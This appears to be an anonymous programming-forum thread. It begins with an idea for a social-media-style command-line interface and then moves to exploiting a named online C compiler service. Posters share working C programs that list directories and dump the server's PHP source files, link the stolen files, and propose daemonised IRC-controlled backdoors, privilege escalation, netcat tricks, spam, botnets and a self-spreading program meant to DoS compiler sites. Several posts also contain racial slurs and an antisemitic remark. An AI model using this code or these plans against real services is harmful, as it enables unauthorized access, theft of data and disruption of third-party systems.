social media interface

hello /prog/,

I would like to be able to use the command line using an interface that doesn't scare people in public. So I was thinking of creating an http server that allows access to the command line through web pages that look like facebook and twitter. Source code would be reformated into walls. Twitter would work well for log files. Any ideas or links to existing work are welcome.

There's already ``web app'' programming notepads and compilers. Some are probably open source, copy their shit and put it on localhost.

Wow I just found an online C compiler that allows the execution of arbitrary network functions and system calls.

>>1
Why?

>>3
jesus

>>5
It gets better. I can traverse the entire filesystem and execute the ``system'' call and THE EXECUTED PROGRAMS RUN AS APACHE I CAN FOPEN AND READ ALL THE SERVER SIDE FILES.

http://www.compileonline.com/compile_c_online.php

Input the following:


#include <stdio.h>
#include <string.h>

main()
{
char buff[2048];
FILE *fp = NULL;
system("ls /var/www/html/");
fp = fopen("/var/www/html/compile_c99_online.php", "r");
if( fp != NULL ){
while ( !feof(fp ) ){
memset(buff, '\0', sizeof( buff) );
fgets(buff, sizeof(buff), (FILE*)fp);
printf("%s", buff );
}
fclose(fp);
}
}


>>4
I don't to be accused of "hacking". I've heard stories of people being asked to leave coffee shops. And what if an illiterate with authority decides to investigate? I just want the ability to do what I do while blending in just in case.

>>6
wow, should we get it to host a bbs?

>>8
Trying to write files to the html folder now but it doesn't seem to want to do it.

>>6
Jesus Christ.

Compiling the source code....
$gcc main.c -o demo -lm -pthread -lgmp -lreadline 2>&1

main.c:1:10: error: #include expects "FILENAME" or <FILENAME>
#include >stdio.h>
^
main.c: In function ‘main’:
main.c:6:5: warning: incompatible implicit declaration of built-in function ‘printf’ [enabled by default]
printf("Hello, Nigger! \n");
^


Most stuff is owned by root, unfortunately. Time to warm up the find-fu.

>>12
Still, because the run programs run as apache and you can get them to do whatever you want, you can daemon them and they'll run in the background with apache's access.

If you cared enough, you could write a program that detached from php's execution with daemon(3), connected to some IRC for commands, and used IPC to fuck with apache and get it to write files / escalate privileges.

The entire FS is exposed so there's plenty you can do, also all networking functions work and there's no chroot.

>>13
So we can run a web server on it. And store the DB in ram

i guess it would be more useful for sending spam or joining a botnet. I'll never know the joys of such things.

Use the black on white theme of your terminal emulator and use proportional fonts. Problem solved.

Here's a gzip'd b64 of all the php files in that guy's /var/www/html folder:

http://pastebin.com/H4LcCJr9

Probably some exploitable code in there (though really what's more exploitable than having pretty much shell access through the compiler?).

Obtained with:


#define _GNU_SOURCE 10000

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>
#include <errno.h>

int filter(const struct dirent *file){

if (strcasestr(file->d_name, ".php") != NULL)
return 1;
else return 0;

}

int main(int argc, char **argv)
{
int n, i;
char *dir = "/var/www/html/";

FILE *dump;
struct dirent **file_list;

n = scandir(dir, &file_list, filter, alphasort);
if (n < 0)
perror("scandir");

fprintf(stderr, "Reading %d files...\n", n);

dump = fopen("./index.txt", "w");
if (dump == NULL) {
perror("File access");
return 1;
}

for (i = 0; i < n; i++){

FILE *fp = NULL;
char full_name[1024] = {0};
char buff[8192] = {0};

snprintf(full_name, 1023, "%s%s", dir, file_list[i]->d_name);

fprintf(dump, "-------------------------------------------------------------------%s-------------------------------------------------------------------\n\n", full_name);


fp = fopen(full_name, "r");

if (fp != NULL){
fprintf(stderr, "Reading file %s...\n", full_name);
while ( !feof(fp ) ){
memset(buff, '\0', sizeof( buff) );
fgets(buff, sizeof(buff)-1, (FILE*)fp);
fprintf(dump, "%s", buff );
}

fprintf(dump, "\n");

fclose(fp);
}

fprintf(dump, "\n\n-------------------------------------------------------------------END FILE-------------------------------------------------------------------\n\n");

free(file_list[i]);
}
free(file_list);

fclose(dump);

return 0;

}


apache can write to /web/com. Certain binaries like cat and curl are blocked, but you can emulate them with the unblocked grep '.*' and netcat. Incredible how half-assed the security on that thing is, makes me not want to ever host a server.

/prog/ botnet member count: 1

Prog challenge #1998

- Round up all online compiler sites that let you compile C and use networking.
- Figure out the shortest max runtime for all the sites.
- Write a program that can post a program to any of the compiler sites, have it execute and take the response.
- Hardcode the list of the compiler sites in the program, and have it post this program randomly to any one of the compiler sites.
- Make it so that when it gets a response, it takes the response's body, and the program's own source, and combines them (as in, sets the response as an argument in the program's automatically rewritten source)
- Make sure one round trip can be executed within the shortest runtime in any of these sites.
- Watch as the sites DoS themselves and get around their own maximum execution time by just passing the program's execution context to each other endlessly and spawning more and more instances of the program over the network.

>>19

sites that let you compile C and use networking

there aren't any

>>20
not any more theres not.

>>20
http://www.compileonline.com/compile_c_online.php

This one does.

I just tested a bunch off of a Google search, many simply have name resolution disabled, but you can get around it if you just do direct system calls.

>>20
It's called a botnet.

http://hackertyper.net/
Just keep one of these tabs running and people will give you respect you deserve.

>>25

There is a video on youtube, where some Jew writes a NES emulator in real-time that way:
http://www.youtube.com/watch?v=y71lli8MS8s

"seeing your skills was the last push I needed to get my lazy ass up and start learning about this stuff."

"Really Impressive!"

"Mesmerizing."

>>1
That's probably the BEST idea I've ever heard

>>3
Link please.

>>26
"I am an enthusiastic supportor of IOCCC"

what a fucking ....... ass

>>22

Following information may be recorded for security purpose:
Your IP Address - [REDACTED]
Your Browser - [REDACTED]
Your Location : [REDACTED]

They seem to have noticed.

hmm

impossible sorry